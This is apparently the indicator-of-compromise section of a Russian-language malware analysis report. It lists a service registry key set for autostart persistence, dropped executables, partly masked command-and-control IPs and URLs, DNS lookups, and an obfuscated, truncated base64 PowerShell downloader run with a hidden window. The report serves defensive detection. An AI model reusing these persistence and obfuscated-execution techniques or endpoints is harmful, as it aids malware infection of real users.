Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\msjetoledb40] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\msjetoledb40] 'ImagePath' = '"%WINDIR%\SysWOW64\unlodctr\msjetoledb40.exe"'
- 'msjetoledb40' "%WINDIR%\SysWOW64\unlodctr\msjetoledb40.exe"
- 'msjetoledb40' %WINDIR%\SysWOW64\unlodctr\msjetoledb40.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVADMAaAB6AGoAdwBtAD0AKAAnAFQAYgAnACsAJwAyACcAKwAoACcAbgB6ACcAKwAnADcAYwAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVABlAE0AUABcAFcATwByAEQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\f1jq4l.exe
- %WINDIR%\syswow64\unlodctr\msjetoledb40.exe
- %TEMP%\word\2019\f1jq4l.exe в %WINDIR%\syswow64\unlodctr\msjetoledb40.exe
- '45.##.219.163':443
- http://sm###plz.com/gobal/Ef7Coxg/
- http://19#.##1.86.6:443/tMI9raBZJ98bU624/3400fznaR/UdQIzBrcJ/xFNDQ/0d29WcNMox2RGfzuN/
- http://45.##.219.163:443/kYUP5red0O63WoE/Omiau79Z9QdiineKuY0/RMTed/3azXaq/ via 45.##.219.163
- DNS ASK sm###plz.com
- DNS ASK ns#.#60wisp.net
- '%TEMP%\word\2019\f1jq4l.exe'
- '%WINDIR%\syswow64\unlodctr\msjetoledb40.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVADMAaAB6AGoAdwBtAD0AKAAnAFQAYgAnACsAJwAyACcAKwAoACcAbgB6ACcAKwAnADcAYwAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVABlAE0AUABcAFcATwByAEQAXAAyADAAMQA5AF...' (со скрытым окном)